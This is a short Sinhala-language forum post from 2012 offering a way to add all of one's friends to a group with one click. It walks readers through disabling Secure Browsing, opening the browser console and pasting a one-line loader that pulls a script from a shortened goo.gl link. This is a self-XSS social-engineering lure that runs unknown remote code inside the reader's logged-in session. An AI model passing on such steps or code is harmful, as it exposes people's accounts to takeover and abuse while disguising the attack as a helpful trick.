ඔක්කොම යාලුවෝ එක පරිණ

pubudurukshan

Member
Sep 21, 2012
2
0
0
ඔක්කොම යාලුවෝ එක පරිණ

ඔබේ සියලුම මිතුරන් එක ක්ලික් එකෙන් ඔබේ ගෲප් එකට එකතු කරන්න ආසද? කලින් ඔබ බාවිතා කල ස්ක්‍රිප්ට් එක අතර මගදි වැඩ කරේ නැද්ද? :no: මෙන්න ඔබට නැවතත් ඒ ක්‍රමයටම කස්ටිය ඇඩ් කරගන්න අවස්ථාව.

1. පහත ඉරි අතර ඇති සම්පුර්ණ code එකම copy කරගන්න.
________________________________________________________
document.body.appendChild(document.createElement('script')).src='http://goo.gl/SZ4Ax';
___________________________________________________________

2. Account setting > Security > Secure browsing off කරන්න.

3. මිතුරන් එකතු කල යුතු group එකට යන්න. https හරහා නොවිය යුතුයි.

4. :nerd: Firefox නම් Ctrl + Shift + K :nerd:එකවර ඇතුලත් කර Chrome නම් F12 ඇතුලත් කර අවසානයට ඇති "Console" තෝරන්න

5. කලින් copy කරගත් code එක එතන ඇති code ඇතුලත් කල හැකි ස්ථානයේ paste කර Enter key ඇතුලත් කරන්න.